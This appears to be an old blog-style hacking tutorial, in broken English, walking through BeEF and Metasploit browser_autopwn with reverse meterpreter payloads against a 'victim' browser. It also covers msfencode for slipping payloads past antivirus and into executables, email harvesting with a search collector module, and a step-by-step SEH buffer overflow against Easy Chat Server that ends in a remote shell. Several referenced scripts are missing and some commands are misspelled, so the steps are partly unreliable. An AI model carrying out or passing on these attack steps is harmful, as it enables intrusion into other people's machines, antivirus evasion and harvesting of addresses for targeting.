Example use beef metasploit

In this season i will explain how to use beef, before you paractical beef-ng application you must open beef-ng application on backtrack > exploitation tool > social engineering tool > Beff xss exploitation

copy file ui/panel and paste on web browser
fill the username and password beef

Open terminal and running metasploit 

root@bt:~# msfconsole

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM

MMMMMMMMMMM                MMMMMMMMMM

MMMN$                           vMMMM

MMMNl  MMMMM             MMMMM  JMMMM

MMMNl  MMMMMMMN       NMMMMMMM  JMMMM

MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM

MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM

MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM

MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM

MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM

MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM

MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM

MMMMR  ?MMNM             MMMMM .dMMMM

MMMMNm `?MMM             MMMM` dMMMMM

MMMMMMN  ?MM             MM?  NMMMMMN

MMMMMMMMNe                 JMMMMMNMMM

MMMMMMMMMMNm,            eMMMMMNMMNMM

MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM

MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM

       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]

+ -- --=[ 787 exploits - 425 auxiliary - 128 post

+ -- --=[ 238 payloads - 27 encoders - 8 nops

       =[ svn r14551 updated 47 days ago (2012.01.14)

                                                                                                                                                                                                

Warning: This copy of the Metasploit Framework was last updated 47 days ago.                                                                                                                    

         We recommend that you update the framework at least every other day.                                                                                                                   

         For information on updating your copy of Metasploit, please see:                                                                                                                       

             https://community.rapid7.com/docs/DOC-1306

Type "search browser" to find modul for auxiliary

msf > search browser

Matching Modules

================

   Name                                                                   Disclosure Date  Rank       Description

   ----                                                                   ---------------  ----       -----------

   auxiliary/dos/windows/browser/ms09_065_eot_integer                     2009-11-10       normal     Microsoft Windows EOT Font Table Directory Integer Overflow

   auxiliary/dos/windows/smb/ms11_019_electbowser                                          manual     Microsoft Windows Browser Pool DoS

   auxiliary/gather/android_htmlfileprovider                                               normal     Android Content Provider File Disclosure

   auxiliary/scanner/http/lucky_punch                                                      normal     HTTP Microsoft SQL Injection Table XSS Infection

   auxiliary/server/browser_autopwn                                                        normal     HTTP Client Automatic Exploiter

Use "auxiliary/server/browser/_autopown" and type show options to see module options

msf > use auxiliary/server/browser_autopwn

msf  auxiliary(browser_autopwn) > show options 

Module options (auxiliary/server/browser_autopwn):

   Name        Current Setting  Required  Description

   ----        ---------------  --------  -----------

   LHOST                        yes       The IP address to use for reverse-connect payloads

   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0

   SRVPORT     8080             yes       The local port to listen on.

   SSL         false            no        Negotiate SSL for incoming connections

   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)

   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

   URIPATH                      no        The URI to use for this exploit (default is random)

Setting LHOST and see result on module options

msf  auxiliary(browser_autopwn) > set LHOST 192.168.56.1

LHOST => 192.168.56.1

Setting PAYLOAD_WIN32 and JAVA after that type exploit to see result

msf  auxiliary(browser_autopwn) > set PAYLOAD_WIN32

PAYLOAD_WIN32 => windows/meterpreter/reverse_tcp

msf  auxiliary(browser_autopwn) > set PAYLOAD_JAVA

PAYLOAD_JAVA => java/meterpreter/reverse_tcp

msf  auxiliary(browser_autopwn) > exploit 

[*] Auxiliary module execution completed

[*] Setup

[*] Obfuscating initial javascript 2012-03-01 00:38:25 +0700

msf  auxiliary(browser_autopwn) > [*] Done in 4.42241719 seconds

Result on exploitation you can see "local ip" it use to exploitation with beef

[*] Using URL: http://0.0.0.0:8080/NWUmoPCg

[*]  Local IP: http://192.168.182.3:8080/NWUmoPCg

[*] Server started. 

Open again beef-ng on browser

click Command > Network > JBoss, fill the blank as this below. click execute!.

Now see computer victim, browser victim is crash

Open again terminal and type "seassons -l"

Last type "seassons -i 1" and now seen Meterpreter

msfencode and msfpayload definition (update)

- Msfencode is another included in the Metasploit framework and is used to encode an exploit or payload. In many cases, basic exploits can be detected by virus scanners, but by encoding them we have a better chance of by passing their detection routines and ensuring that our payload get executes on the target system. In addition, recent updates  to msfencode also allow us to encode a payload into an existing executable! This mean you can take the normal application, encode it with our payload, and end up with an encoded copy of the executable containing the payload and ready to run thr target system. This goes very well with the concepts that we've talked about with custom malware where an actual usable program is sent to the target but our malware is sent with it.
to use msf encode you must open terminal and type
- #msfencode -l

change directory to msf3 after that one of the easiest ways to use msfencode is to just directly pipe the output from msfpayload to it. After you determine which encoding method you want to use, you then determine which format you want to receive the result in similiar to msypayload. for example, we will use the x86/shikata_ga_nai encoder and output to another executable. the result is 

- msfpayload is component of metaspolit alllows to generate shellcode, executable, and much more for use in exploit outside of the framework. Shellcode can be generated in many formats including C, Ruby , JavaScript, and even Visual basic for Application. Each output format will be useful in various situations.

To use msf encode you must open terminal and type 

- #msfconsole -l

Type scrpit this below to listening and determining payload

SE and SET definition

SE (Social Engineering) trick conducted by a hacker/cracker to fool the victim to want to do something.
SET (Social Engineering Toolkit) is specifically designed to perform advanced attacks againts the human element. Originally this tool was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration tester arsenal. SET was written by David Kennedy and a with a lot of help from the community in incorporating attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted an focused attacks againts a person or organization used during a penetration test.

Use auxilary metasploit (update)

Open the terminal and type msfconsole
Type this commend below to use the email collector we've been added before

We type "show Auxiliary" to see auxiliary

We use "auxiliary/gather/search_email_collector" and we type "show options" to see parameters can we use

msf > use gather/search_email_collector

msf  auxiliary(search_email_collector) > show options 

Module options (auxiliary/gather/search_email_collector):

   Name           Current Setting  Required  Description

   ----           ---------------  --------  -----------

   DOMAIN                          yes       The domain name to locate email addresses for

   OUTFILE                         no        A filename to store the generated email list

   SEARCH_BING    true             yes       Enable Bing as a backend search engine

   SEARCH_GOOGLE  true             yes       Enable Google as a backend search engine

   SEARCH_YAHOO   true             yes       Enable Yahoo! as a backend search engine

We use Domain to search email y**oo

There it is the email address for the specified domain. There are only example for auxiliary metasploit. 

Linux Exploitation

Before Exploitation Linux we must turn off ASLR with this step

Type script this below

Running the aplication with gdb

overwrite EIP with give sending data fuzzing

Type here for more info register eip

Type on below to see entrance stack application, and look register esp

Running sc_generator to find Shellcode

Insert Shellcode into the fuzzer and exploit linux like this below

Buffer Overflow easy chat server "seh and safeseh"

first  i want to search vulnerability "easy chat server" i choose wireshark to sniffing packet data on easy server. Before i try to use wireshark, i play easy chat server with web browser. Iam register easy chat server.

I want to login easy with server, and i choose frinds to chat with me

Run wireshark to sniffing packet data on easy chat server. I see packet data on easy chat sever with ip 192.168.56.101. 

I type source for fuzzing on wireshark. I build fuzzing this below :

Run easy chat server after that OllyDbg, klik view > attack, search easy chat server > attack. 

This file is crash, however register EIP no crushed of buffer to sending. Because this application use seh. Fot view to seh, choose view > SEH Chain.

Now EIP value to be 41414141

To view data inside the application memory, right click line stack 3 > follow in dump. Then on the left of the memory window seen in the data buffer memory. 

copying file ssleay32.dll in system backtrack to search whether this file contain seh.

Open terminal and enter the metasploit. type ./msfpescan -p /tmp/ssleay32.dll. Try module to have file ssleay32.dll on SEH Chain.

Double click SSLEAY32.dll, right click > search for > sequence of command. After that windows search is appear, type POP r32, POP r32, RETN, click find

Now OllyDbg has found address memory in the SSLEAY32.dll.

Open terminla and search ./pattern_create.rb

Copy pattern_create.rb into script and run script again. easy chat server has been crash. Note value at EIP.

Open terminal and search pattern_offset with value contained in the EIP

Type script this below :

Script sucessfully executed, buffer value \x41 success entry into SEH handler

 Type script below to enter address msfpescan from SSLEAY32.dll

See that the process has break by OllyDbg exactly when it will access the address SSLEAY32.dll
looking into SE Chain

push shift + f9 to countinue prosses in memory SSLEAY32.dll

Open web browser and type localhost with port 5555. Now at the Metasploit, choose payload search os :: win32, after that choose again Windows bind shell

and a know this payload any bad character. Iam reply to build payload with how to clean bad character "\x20\x25\x0a\x0d\x08\x80\x32\x6e\x3f"

Copy payload into script fuzzer

Run the script 

See the result, easy chat server is crash

Access telnet with terminal. Now exploit is success....